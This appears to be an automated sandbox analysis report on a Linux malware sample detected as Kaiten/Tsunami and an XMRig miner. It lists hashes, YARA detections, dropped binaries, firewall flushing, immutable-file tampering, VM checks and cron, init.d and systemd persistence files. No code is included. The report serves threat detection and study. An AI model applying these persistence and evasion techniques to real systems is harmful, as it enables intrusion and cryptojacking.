Analysis
max time kernel: 146s
max time network: 151s
platform: ubuntu-20.04_amd64
resource: ubuntu2004-amd64-20240611-en
resource tags: arch:amd64, arch:i386, image:ubuntu2004-amd64-20240611-en, kernel:5.4.0-169-generic, locale:en-us, os:ubuntu-20.04-amd64, system
submitted: 26-10-2024 13:10

Behavioral task: behavioral1
Sample: 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b
Resource: ubuntu2004-amd64-20240611-en

General
Target: 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b
Size: 7.0MB
MD5: c91421f0d68095890b50a034dbf9d060
SHA1: 624e0d9c94309de8d038b2e21cf07685d2020fdb
SHA256: 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b
SHA512: 63d174cf0ba590aa836a9c4490ef7982d7590d8fcf9f67b8a8021dc23755a4aecf16805a12679e566d6d6bec45a4d3344d62197a7f3c6660c46812594888bd88
SSDEEP: 49152:FdvgYnvuqgrb/TGvO90dL3BmAFd4A64nsfJYgJi1QjpzkpDKzBzQgQHDSZ/+/A5X:YqpgxDFnEqZJvlNiPt9y7LxXk5prrT

Malware Config
Signatures
Detects Kaiten/Tsunami Payload (13 IoCs)
resource  yara_rule
behavioral1/memory/2079-3-0x00007f4134858000-0x00007f413486c700-memory.dmp  family_kaiten2
behavioral1/memory/2088-4-0x00007ff117c12000-0x00007ff117c26700-memory.dmp  family_kaiten2
behavioral1/memory/2533-7-0x00007fc5ad3f2000-0x00007fc5ad406700-memory.dmp  family_kaiten2
behavioral1/memory/2965-10-0x00007fd01a268000-0x00007fd01a27c700-memory.dmp  family_kaiten2
behavioral1/memory/3429-13-0x00007f4bced46000-0x00007f4bced5a700-memory.dmp  family_kaiten2
behavioral1/memory/3873-16-0x00007fd054c54000-0x00007fd054c68700-memory.dmp  family_kaiten2
behavioral1/memory/4303-19-0x00007fbf5e30e000-0x00007fbf5e322700-memory.dmp  family_kaiten2
behavioral1/memory/4747-22-0x00007f9c2e966000-0x00007f9c2e97a700-memory.dmp  family_kaiten2
behavioral1/memory/5191-25-0x00007f6b946a1000-0x00007f6b946b5700-memory.dmp  family_kaiten2
behavioral1/memory/5638-28-0x00007fe9ca191000-0x00007fe9ca1a5700-memory.dmp  family_kaiten2
behavioral1/memory/6082-31-0x00007fc8b726a000-0x00007fc8b727e700-memory.dmp  family_kaiten2
behavioral1/memory/6526-34-0x00007f48d5e42000-0x00007f48d5e56700-memory.dmp  family_kaiten2
behavioral1/memory/6970-37-0x00007efce17cb000-0x00007efce17df700-memory.dmp  family_kaiten2

Detects Kaiten/Tsunami payload (13 IoCs)
resource  yara_rule
behavioral1/memory/2079-3-0x00007f4134858000-0x00007f413486c700-memory.dmp  family_kaiten
behavioral1/memory/2088-4-0x00007ff117c12000-0x00007ff117c26700-memory.dmp  family_kaiten
behavioral1/memory/2533-7-0x00007fc5ad3f2000-0x00007fc5ad406700-memory.dmp  family_kaiten
behavioral1/memory/2965-10-0x00007fd01a268000-0x00007fd01a27c700-memory.dmp  family_kaiten
behavioral1/memory/3429-13-0x00007f4bced46000-0x00007f4bced5a700-memory.dmp  family_kaiten
behavioral1/memory/3873-16-0x00007fd054c54000-0x00007fd054c68700-memory.dmp  family_kaiten
behavioral1/memory/4303-19-0x00007fbf5e30e000-0x00007fbf5e322700-memory.dmp  family_kaiten
behavioral1/memory/4747-22-0x00007f9c2e966000-0x00007f9c2e97a700-memory.dmp  family_kaiten
behavioral1/memory/5191-25-0x00007f6b946a1000-0x00007f6b946b5700-memory.dmp  family_kaiten
behavioral1/memory/5638-28-0x00007fe9ca191000-0x00007fe9ca1a5700-memory.dmp  family_kaiten
behavioral1/memory/6082-31-0x00007fc8b726a000-0x00007fc8b727e700-memory.dmp  family_kaiten
behavioral1/memory/6526-34-0x00007f48d5e42000-0x00007f48d5e56700-memory.dmp  family_kaiten
behavioral1/memory/6970-37-0x00007efce17cb000-0x00007efce17df700-memory.dmp  family_kaiten

Kaiten family
Xmrig family

XMRig Miner payload (26 IoCs)
resource  yara_rule
behavioral1/memory/1701-1-0x00007f41946e0000-0x00007f4194d9ed40-memory.dmp  xmrig
behavioral1/memory/2001-2-0x00007f413894c000-0x00007f413900ad40-memory.dmp  xmrig
behavioral1/memory/2089-5-0x00007fa4fb901000-0x00007fa4fbfbfd40-memory.dmp  xmrig
behavioral1/memory/2434-6-0x00007f77ff491000-0x00007f77ffb4fd40-memory.dmp  xmrig
behavioral1/memory/2534-8-0x00007f614cdb7000-0x00007f614d475d40-memory.dmp  xmrig
behavioral1/memory/2879-9-0x00007fb51081d000-0x00007fb510edbd40-memory.dmp  xmrig
behavioral1/memory/2966-11-0x00007fcd89d57000-0x00007fcd8a415d40-memory.dmp  xmrig
behavioral1/memory/3311-12-0x00007f035218a000-0x00007f0352848d40-memory.dmp  xmrig
behavioral1/memory/3430-14-0x00007f138942b000-0x00007f1389ae9d40-memory.dmp  xmrig
behavioral1/memory/3775-15-0x00007f4731d95000-0x00007f4732453d40-memory.dmp  xmrig
behavioral1/memory/3874-17-0x00007f97d1d6b000-0x00007f97d2429d40-memory.dmp  xmrig
behavioral1/memory/4219-18-0x00007f682e93c000-0x00007f682effad40-memory.dmp  xmrig
behavioral1/memory/4304-20-0x00007f2792924000-0x00007f2792fe2d40-memory.dmp  xmrig
behavioral1/memory/4649-21-0x00007f37d18d3000-0x00007f37d1f91d40-memory.dmp  xmrig
behavioral1/memory/4748-23-0x00007f5e60329000-0x00007f5e609e7d40-memory.dmp  xmrig
behavioral1/memory/5093-24-0x00007f0e83571000-0x00007f0e83c2fd40-memory.dmp  xmrig
behavioral1/memory/5192-26-0x00007f5d1d11a000-0x00007f5d1d7d8d40-memory.dmp  xmrig
behavioral1/memory/5537-27-0x00007fa2f7da0000-0x00007fa2f845ed40-memory.dmp  xmrig
behavioral1/memory/5639-29-0x00007f5b6eec9000-0x00007f5b6f587d40-memory.dmp  xmrig
behavioral1/memory/5984-30-0x00007fc668eeb000-0x00007fc6695a9d40-memory.dmp  xmrig
behavioral1/memory/6083-32-0x00007f0d0b0c2000-0x00007f0d0b780d40-memory.dmp  xmrig
behavioral1/memory/6428-33-0x00007f32a61d9000-0x00007f32a6897d40-memory.dmp  xmrig
behavioral1/memory/6527-35-0x00007fbc6a23a000-0x00007fbc6a8f8d40-memory.dmp  xmrig
behavioral1/memory/6872-36-0x00007fc1d13cb000-0x00007fc1d1a89d40-memory.dmp  xmrig
behavioral1/memory/6971-38-0x00007fb5fc574000-0x00007fb5fcc32d40-memory.dmp  xmrig
behavioral1/memory/7316-39-0x00007f4c4cde6000-0x00007f4c4d4a4d40-memory.dmp  xmrig

File and Directory Permissions Modification (1 TTPs, 39 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
pid  Process
6228  Process not Found
2128  sh
2679  chmod
3005  sh
3021  chmod
5678  Process not Found
1740  sh
1756  chmod
1795  chmod
2144  chmod
2234  chmod
3485  chmod
7026  Process not Found
2589  chmod
3469  sh
4803  Process not Found
4893  Process not Found
5694  Process not Found
6566  Process not Found
3913  sh
4359  Process not Found
5337  Process not Found
3111  chmod
4019  chmod
4449  Process not Found
5784  Process not Found
6138  Process not Found
6582  Process not Found
2573  sh
3929  chmod
4343  Process not Found
4787  Process not Found
5231  Process not Found
5247  Process not Found
6122  Process not Found
3575  chmod
6672  Process not Found
7010  Process not Found
7116  Process not Found

Executes dropped EXE (40 IoCs)
ioc  pid  Process
/etc/init.d/knlib  1614  knlib
/tmp/service-agent  1701  service-agent
/tmp/service-agent  2001  service-agent
/tmp/sys-helper  2079  sys-helper
/tmp/sys-helper  2088  sys-helper
/tmp/service-agent  2089  service-agent
/tmp/service-agent  2434  service-agent
/tmp/sys-helper  2533  sys-helper
/tmp/service-agent  2534  service-agent
/tmp/service-agent  2879  service-agent
/tmp/sys-helper  2965  sys-helper
/tmp/service-agent  2966  service-agent
/tmp/service-agent  3311  service-agent
/tmp/sys-helper  3429  sys-helper
/tmp/service-agent  3430  service-agent
/tmp/service-agent  3775  service-agent
/tmp/sys-helper  3873  sys-helper
/tmp/service-agent  3874  service-agent
/tmp/service-agent  4219  service-agent
/tmp/sys-helper  4303  Process not Found
/tmp/service-agent  4304  Process not Found
/tmp/service-agent  4649  Process not Found
/tmp/sys-helper  4747  Process not Found
/tmp/service-agent  4748  Process not Found
/tmp/service-agent  5093  Process not Found
/tmp/sys-helper  5191  Process not Found
/tmp/service-agent  5192  Process not Found
/tmp/service-agent  5537  Process not Found
/tmp/sys-helper  5638  Process not Found
/tmp/service-agent  5639  Process not Found
/tmp/service-agent  5984  Process not Found
/tmp/sys-helper  6082  Process not Found
/tmp/service-agent  6083  Process not Found
/tmp/service-agent  6428  Process not Found
/tmp/sys-helper  6526  Process not Found
/tmp/service-agent  6527  Process not Found
/tmp/service-agent  6872  Process not Found
/tmp/sys-helper  6970  Process not Found
/tmp/service-agent  6971  Process not Found
/tmp/service-agent  7316  Process not Found

Flushes firewall rules (1 TTPs, 15 IoCs)
Flushes/disables firewall rules inside the Linux kernel.
pid  Process
1761  update-rc.d
5699  Process not Found
6587  Process not Found
2594  update-rc.d
3026  update-rc.d
3934  update-rc.d
6143  Process not Found
1396  ufw
2149  update-rc.d
4364  Process not Found
5252  Process not Found
7031  Process not Found
1597  iptables
3490  update-rc.d
4808  Process not Found
ioc  pid  Process
/usr/lib/modules/5.4.0-169-generic/kernel/net/ipv6/netfilter/ip6_tables.ko  1400  modprobe

Reads EFI boot settings (1 TTPs, 64 IoCs)
Reads EFI boot settings from the efivars filesystem, which may contain security secrets or sensitive data.
description  ioc  Process
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  systemctl
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  systemctl
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  systemctl
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  systemctl
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  systemctl
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  systemctl
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  systemctl
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  systemctl
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  systemctl
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  systemctl
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  systemctl
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  systemctl
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  systemctl
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  systemctl
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  systemctl
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  systemctl
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  systemctl
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  systemctl
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  systemctl
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  systemctl
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  systemctl
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  systemctl
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  systemctl
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  systemctl
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  systemctl
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  systemctl
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  systemctl
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  systemctl
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  systemctl
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  systemctl
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found
File opened for reading  /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67  Process not Found

Attempts to change immutable files (64 IoCs)
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid  Process
3799  sh
5842  Process not Found
6008  Process not Found
6127  Process not Found
7010  Process not Found
3860  chattr
4505  Process not Found
6073  Process not Found
6286  Process not Found
6292  Process not Found
1760  chattr
4448  Process not Found
5179  Process not Found
5401  Process not Found
5634  Process not Found
1613  chattr
5180  Process not Found
5643  Process not Found
4246  hostname
5189  Process not Found
6137  Process not Found
7179  Process not Found
6516  Process not Found
3425  chattr
3574  sed
4513  Process not Found
4807  Process not Found
6011  Process not Found
3426  chattr
4676  Process not Found
5395  Process not Found
5636  Process not Found
6576  Process not Found
7174  Process not Found
3928  sed
4741  Process not Found
5626  Process not Found
6076  Process not Found
6512  Process not Found
4353  Process not Found
5246  Process not Found
6972  Process not Found
1599  chattr
2737  chattr
3022  chattr
3859  chattr
4305  Process not Found
5633  Process not Found
6571  Process not Found
6896  Process not Found
2535  sh
3472  chattr
4018  sed
4343  Process not Found
5400  Process not Found
2143  sed
2529  chattr
4083  chattr
5177  Process not Found
5693  Process not Found
6566  Process not Found
1757  chattr
2148  chattr
3335  sh

Checks hardware identifiers (DMI) (1 TTPs, 64 IoCs)
Checks DMI information, which indicates whether the system is a virtual machine.
description  ioc  Process
File opened for reading  /sys/devices/virtual/dmi/id/sys_vendor  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/sys_vendor  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/bios_vendor  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/sys_vendor  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/bios_vendor  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/product_name  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/product_name  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/product_name  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/product_name  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/board_vendor  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/board_vendor  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/board_vendor  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/board_vendor  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/product_name  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/board_vendor  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/product_name  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/bios_vendor  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/sys_vendor  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/board_vendor  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/bios_vendor  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/sys_vendor  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/bios_vendor  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/board_vendor  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/bios_vendor  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/bios_vendor  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/board_vendor  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/sys_vendor  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/product_name  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/product_name  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/board_vendor  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/sys_vendor  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/sys_vendor  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/sys_vendor  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/bios_vendor  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/product_name  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/sys_vendor  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/bios_vendor  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/product_name  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/board_vendor  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/bios_vendor  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/board_vendor  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/product_name  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/product_name  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/sys_vendor  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/product_name  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/bios_vendor  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/product_name  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/bios_vendor  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/bios_vendor  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/sys_vendor  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/product_name  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/board_vendor  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/sys_vendor  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/product_name  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/bios_vendor  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/product_name  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/bios_vendor  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/board_vendor  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/sys_vendor  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/product_name  Process not Found
File opened for reading  /sys/devices/virtual/dmi/id/product_name  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/sys_vendor  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/board_vendor  service-agent
File opened for reading  /sys/devices/virtual/dmi/id/sys_vendor  service-agent

Creates/modifies Cron job (1 TTPs, 64 IoCs)
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description  ioc  Process
File opened for modification  /etc/cron.daily/pwnrig  tee
File opened for modification  /var/spool/cron/crontabs/tmp.mDK5Lj  crontab
File opened for modification  /etc/cron.monthly/pwnrig  tee
File opened for modification  /etc/cron.daily/sedoEWJ3b  sed
File opened for modification  /etc/cron.weekly/pwnrig  Process not Found
File opened for modification  /etc/cron.weekly/pwnrig  Process not Found
File opened for modification  /etc/cron.weekly/sedD8jNsO  Process not Found
File opened for modification  /etc/cron.daily/pwnrig  tee
File opened for modification  /etc/cron.monthly/sedOrn16T  sed
File opened for modification  /etc/cron.hourly/pwnrig  tee
File opened for modification  /etc/cron.weekly/pwnrig  tee
File opened for modification  /etc/cron.monthly/sedudO77I  Process not Found
File opened for modification  /var/spool/cron/crontabs/tmp.OIEvOZ  Process not Found
File opened for modification  /etc/cron.hourly/sedUmorLk  Process not Found
File opened for modification  /etc/cron.daily/sedWqS2Uh  Process not Found
File opened for modification  /etc/cron.daily/sedqy8mfn  Process not Found
File opened for modification  /etc/cron.daily/.lib-knlib4  2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b
File opened for modification  /etc/cron.monthly/pwnrig  tee
File opened for modification  /etc/cron.d/pwnrig  tee
File opened for modification  /etc/cron.weekly/sedIsQkIi  Process not Found
File opened for modification  /etc/cron.weekly/sedaTiNsT  Process not Found
File opened for modification  /etc/cron.daily/pwnrig  Process not Found
File opened for modification  /etc/cron.weekly/sed7iRwyp  Process not Found
File opened for modification  /etc/cron.monthly/pwnrig  tee
File opened for modification  /var/spool/cron/crontabs/tmp.AvSAUW  crontab
File opened for modification  /etc/cron.daily/pwnrig  tee
File opened for modification  /etc/cron.monthly/sedPz9TWk  Process not Found
File opened for modification  /var/spool/cron/crontabs/tmp.TxyZKy  Process not Found
File opened for modification  /etc/cron.d/sed0iseHQ  Process not Found
File opened for modification  /etc/cron.monthly/sedcFoEXf  Process not Found
File opened for modification  /etc/cron.monthly/sed0CuEVV  sed
File opened for modification  /var/spool/cron/crontabs/tmp.8ZbkqZ  crontab
File opened for modification  /etc/cron.monthly/sedbnTLDQ  Process not Found
File opened for modification  /etc/cron.d/sedTkwV5g  Process not Found
File opened for modification  /etc/cron.weekly/sedLZMkbg  Process not Found
File opened for modification  /etc/cron.weekly/sedM7OhNS  sed
File opened for modification  /etc/cron.daily/pwnrig  tee
File opened for modification  /etc/cron.weekly/sedqBp5jE  sed
File opened for modification  /var/spool/cron/crontabs/tmp.vOwVkv  Process not Found
File opened for modification  /etc/cron.weekly/sedz9GZwL  Process not Found
File opened for modification  /etc/cron.daily/pwnrig  Process not Found
File opened for modification  /etc/cron.weekly/sedy9BWth  sed
File opened for modification  /etc/cron.hourly/pwnrig  Process not Found
File opened for modification  /etc/cron.hourly/sedY31bAg  Process not Found
File opened for modification  /etc/cron.monthly/sedwOF3LO  Process not Found
File opened for modification  /etc/cron.d/sedR6T5HV  sed
File opened for modification  /etc/cron.daily/pwnrig  tee
File opened for modification  /etc/cron.d/sedsiEgQe  sed
File opened for modification  /var/spool/cron/crontabs/tmp.rDgoux  Process not Found
File opened for modification  /etc/cron.daily/sedvJO8qN  Process not Found
File opened for modification  /etc/cron.hourly/pwnrig  tee
File opened for modification  /etc/cron.monthly/sedY0xtKg  sed
File opened for modification  /etc/cron.monthly/sedbCeyzA  sed
File opened for modification  /var/spool/cron/crontabs/tmp.6dAyyj  crontab
File opened for modification  /etc/cron.weekly/pwnrig  Process not Found
File opened for modification  /etc/cron.weekly/pwnrig  Process not Found
File opened for modification  /etc/cron.d/pwnrig  Process not Found
File opened for modification  /var/spool/cron/.lib-knlib4  2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b
File opened for modification  /etc/cron.daily/sedKgmymg  sed
File opened for modification  /etc/cron.hourly/sedZHjEKx  sed
File opened for modification  /etc/cron.daily/pwnrig  Process not Found
File opened for modification  /etc/cron.weekly/pwnrig  tee
File opened for modification  /etc/cron.monthly/sedeO5NLF  sed
File opened for modification  /etc/cron.hourly/pwnrig  Process not Found

Enumerates running processes
Discovers information about currently running processes on the system

description  ioc  Process
File opened for modification  /etc/init.d/sediPbNZA  Process not Found
File opened for modification  /etc/init.d/sedQeWv9n  sed
File opened for modification  /etc/init.d/sedFr125r  sed
File opened for modification  /etc/init.d/sedn3OQn1  sed
File opened for modification  /etc/init.d/sedZ4MXP4  Process not Found
File opened for modification  /etc/init.d/sedcb1kWQ  sed
File opened for modification  /etc/init.d/sed56LIQ4  sed
File opened for modification  /etc/init.d/pwnrig  Process not Found
File opened for modification  /etc/init.d/sedRT5JxH  sed
File opened for modification  /etc/init.d/pwnrig  tee
File opened for modification  /etc/init.d/sedc4XUwv  Process not Found
File opened for modification  /etc/init.d/pwnrig  Process not Found
File opened for modification  /etc/init.d/sedL3LKEF  Process not Found
File opened for modification  /etc/init.d/pwnrig  Process not Found
File opened for modification  /etc/init.d/sedQcJ9d4  Process not Found
File opened for modification  /etc/init.d/pwnrig  tee
File opened for modification  /etc/init.d/pwnrig  Process not Found
File opened for modification  /etc/init.d/pwnrig  tee
File opened for modification  /etc/init.d/pwnrig  tee
File opened for modification  /etc/init.d/sedHZVRcw  Process not Found
File opened for modification  /etc/init.d/pwnrig  Process not Found
File opened for modification  /etc/init.d/sedA51rlb  Process not Found
File opened for modification  /etc/init.d/pwnrig  Process not Found
File opened for modification  /etc/init.d/knlib  2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b
File opened for modification  /etc/init.d/pwnrig  tee
File opened for modification  /etc/init.d/pwnrig  tee
File opened for modification  /etc/init.d/pwnrig  Process not Found

Modifies systemd (2 TTPs, 27 IoCs)
Adds/modifies systemd service files, likely to achieve persistence.
description  ioc  Process
File opened for modification  /etc/systemd/system/pwnrige.service  tee
File opened for modification  /lib/systemd/system/pwnrigl.service  tee
File opened for modification  /lib/systemd/system/pwnrigl.service  Process not Found
File opened for modification  /etc/systemd/system/pwnrige.service  tee
File opened for modification  /etc/systemd/system/pwnrige.service  Process not Found
File opened for modification  /etc/systemd/system/knlibe.service  2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b
File opened for modification  /etc/systemd/system/pwnrige.service  Process not Found
File opened for modification  /etc/systemd/system/pwnrige.service  Process not Found
File opened for modification  /lib/systemd/system/pwnrigl.service  tee
